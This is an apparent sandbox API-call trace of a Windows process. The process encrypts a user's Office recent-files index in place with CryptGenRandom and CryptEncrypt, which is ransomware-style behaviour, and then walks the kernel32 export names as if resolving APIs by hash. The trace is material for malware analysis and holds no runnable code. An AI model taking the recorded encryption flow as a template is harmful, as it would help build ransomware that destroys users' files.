[0078.115] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.115] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.116] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=52) returned 1 [0078.116] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.116] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.116] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.116] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.116] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.118] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.118] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.118] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.118] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.119] CloseHandle (hObject=0x45c) returned 1 [0078.119] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.119] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.119] CloseHandle (hObject=0x0) returned 0 [0078.120] CloseHandle (hObject=0x458) returned 1 [0078.120] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.120] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.121] GetTickCount () returned 0x114c072 [0078.121] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.121] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.121] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.122] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.122] lstrlenA (lpString="kernel32.dll") returned 12 [0078.122] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.122] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.122] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.122] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.122] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.122] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.122] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.122] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.122] lstrlenA (lpString="ADDATOMA") returned 8 [0078.122] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.122] lstrlenA (lpString="ADDATOMW") returned 8 [0078.122] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.122] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.122] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.122] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.122] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.122] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.122] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.122] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.123] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.123] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.123] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.123] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.123] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.123] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.123] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.123] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.123] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.123] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.123] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.123] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.123] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.123] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.123] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.123] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.123] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.123] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.124] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.124] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.124] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.124] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.124] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.124] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.124] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.124] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.124] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.124] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.124] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.124] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.124] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.124] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.124] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.124] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.124] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.124] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.124] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.125] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.125] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.125] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.125] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.125] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.125] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.125] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.125] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.125] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.125] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.125] lstrlenA (lpString="BEEP") returned 4 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.125] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.125] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.125] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.125] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.125] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.125] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.125] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.125] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.126] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.126] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.126] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.126] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.126] lstrlenA (lpString="CANCELIO") returned 8 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.126] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.126] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.126] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.126] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.126] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.126] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.126] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.126] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.126] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.126] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.126] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.126] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.126] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.126] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.127] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.127] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.127] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.127] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.127] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.127] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.127] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.127] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.127] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.127] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.127] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.127] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.127] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.127] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.127] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.127] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.127] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.127] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.127] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.128] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.128] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.128] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.128] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.128] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.128] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.128] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.128] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.128] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 